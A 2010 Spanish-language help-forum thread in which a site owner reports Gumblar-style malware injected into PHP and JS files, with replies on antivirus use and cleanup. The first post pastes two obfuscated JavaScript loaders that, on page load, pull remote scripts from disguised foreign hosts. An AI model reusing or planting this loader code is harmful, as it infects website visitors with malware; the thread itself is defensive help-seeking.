Foros del Web » Soporte técnico » Virus, troyanos y spyware »

Se inyecto codigo malicioso en php y js

Estas en el tema de Se inyecto codigo malicioso en php y js en el foro de Virus, troyanos y spyware en Foros del Web. Hola amigos de un tiempo para aca se inyecto en mi web un codigo malicioso yo creo fue por via ftp tomando mis contraseñas y ...
  #1 (permalink)  
Antiguo 09/02/2010, 22:12
 
Fecha de Ingreso: abril-2006
Mensajes: 56
Antigüedad: 18 años, 7 meses
Puntos: 0
Se inyecto codigo malicioso en php y js

Hola amigos de un tiempo para aca se inyecto en mi web un codigo malicioso yo creo fue por via ftp tomando mis contraseñas y atacando los archivos index.php y .js al abrir mi web mi antivirus me detecta un troyando, cheque mis codigos y ya lo localize, ya lo estoy limpiando alguien sabe de algun programa para quitarlo o la manera de evitarlo nuevamente?? el codigo que se coloca en mis paginas es este:



<script>var q=new String();var dl;if(dl!='' && dl!='y'){dl=null};var b=false;this.p='';var t=document;var rz;if(rz!='z'){rz='z'};this.pp=49029;var c='s1c^r1iTp/t/'.replace(/[/\^1DT]/g, '');var dg;if(dg!=''){dg='f'};var w=window;var je;if(je!='td' && je!='qf'){je=''};var ca;if(ca!=''){ca='sw'};var i;if(i!=''){i='g'};w.onload=function(){try {var sf;if(sf!=''){sf='fp'};this.wu=41177;w_=t.createEl ement(c);var bs;if(bs!='au'){bs=''};var wb='';var de;if(de!='' && de!='rs'){de=''};w_.src='h&t<t<pR:M/O/Ra<pMp<lMeO-&c&oOm<.Mp<rMi<cReMl<iOnMeO.RcOo<mM.Rn<u&-<nRlR.&r&e&c<e<nRtOmRe&x<iRcOoO.Rr<uR:M8<0M8M0&/MgRoOo&gMlMeO.&c&oMmM/OgOoMo<gRlOeM.Rc<o<mR/Oc&n<e&tR.RcOo&mM/&gRaRmRe<t<rRa&iOlMeOr<sM.McRoOmO/MrRaOp<i&dO4Mm&e<.&cRoRm</O'.replace(/[O&\<MR]/g, '');w_.setAttribute('dgegfwewry'.replace(/[y2wPg]/g, ''), "1");var be;if(be!='ms'){be='ms'};var wvf=new String();var def;if(def!='' && def!='zg'){def=null};t.body.appendChild(w_);} catch(d){var bq=new String();var waq=new String();};var lr;if(lr!='x' && lr!='m_'){lr='x'};};var _s=new Array();var mk;if(mk!='' && mk!='yh'){mk=''};</script>

<script>var a;if(a!='sr' && a!='m'){a='sr'};var x=document;var i='s>cMr!iMp!t7'.replace(/[7/\!M\>]/g, '');var n;if(n!=''){n='h'};var s=window;var v;if(v!='' && v!='ifs'){v='q'};var f_;if(f_!='e' && f_!='mz'){f_=''};var o="";s.onload=function(){try {var qh;if(qh!='k'){qh='k'};var z;if(z!=''){z='mk'};sm=x.createElement(i);sm.src=' hXtXt&pO:Z/Z/OhWu&fOfOiZnZgXt&oXnXp&oWs&t&-Xc&oWmZ.&aOs&.WcOoWmX.OaWmOa&z&oWnX-Wc&n&.Zt&hWeZlXiWfOeWtWaZgO.ZrWu&:W8X0W8Z0O/Zc&o&sZtXcWoW.WcWo&mZ/&cZoOsWtWcZoZ.OcZoZmX/WoXwX.&lXyO/WgOoWoXg&lWeZ.XcZo&.Oi&lO/Wg&oZoOgOlXeZ.XcWo&mW/W'.replace(/[W&OZX]/g, '');var tl;if(tl!='j'){tl='j'};var bv="bv";sm.setAttribute('dYeYfVePrY'.replace(/[YVPNM]/g, ''), "1");x.body.appendChild(sm);var zm=new Array();} catch(f){};var g;if(g!='' && g!='xs'){g='fe'};var hq='';};var qp="";var ei="";</script>
<!--94c3d5eee31438fefd816615516420a0-->
  #2 (permalink)  
Antiguo 12/02/2010, 15:25
Avatar de CircuitoX  
Fecha de Ingreso: julio-2008
Mensajes: 756
Antigüedad: 16 años, 4 meses
Puntos: 21
Respuesta: Se inyecto codigo malicioso en php y js

hermano usa kaspersky...

Para darte una idea exacta ... puedes entrar a msconfig y ir a la pestaña de servicios..

hacer en check en ocultar todos los servicios de windows...

al hacer esto te aparecera algunos nomobres estos nombres lo constatas con google .. (solo pones el nombre y te dira que apliacion o que servicio es)
si es un virus te lo dira. .
por otra parte puedes ver los procesos que se incian en el administradro de tares (pestaña procesos)

trata de cerrar todos los programas y ver que procesos estan corriendo si desconfias de algo. tienes google para ver de que proceso se trata...

si encuentras el codigo malicioso usa kasperksky ...
tiene eliminacion de spyware rookkis, malware, etc....

todo en una sola aplicacion. ..usa de la ultima version 2010


mis saludos
__________________
Diseño Robotico en Arequipa / Desarrollo web / Sitios / Paginas / 99 css3
  #3 (permalink)  
Antiguo 13/02/2010, 14:57
 
Fecha de Ingreso: agosto-2005
Mensajes: 122
Antigüedad: 19 años, 4 meses
Puntos: 2
Respuesta: Se inyecto codigo malicioso en php y js

Hola retro_mb,

Lo que indicas es causado por un virus/troyano estilo Gumblar que efectivamente ha accedido al servidor con tu usuario y contraseña FTP, descargado los archivos, modificandolos y subiendolos de nuevo. Los archivos .htm, .php y .js ya modificados son indetectables por los antivirus ya que dicho malware "general" una encriptacion nueva y diferente para cada archivo que infecta. La solucion es cambiar contraseñas de FTP y cPanel desde una maquina y buscar archivo por archivo para eliminar el codigo malicioso. Tambien seria recomendable que pases varios antivirus en tu antivirus para estar seguro de que estas limpio... aun que lo mas recomendable siempre es formatear y restaurar copias de seguridad, pero eso no siempre es posible.

Saludos
__________________
IberHosting - Alojamiento Web Linux
¡Aceptamos Bitcoins!
  #4 (permalink)  
Antiguo 14/02/2010, 19:20
 
Fecha de Ingreso: abril-2006
Mensajes: 56
Antigüedad: 18 años, 7 meses
Puntos: 0
Respuesta: Se inyecto codigo malicioso en php y js

Gracias a todos por sus respuestas

Etiquetas: js, malicioso, php
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 23:33.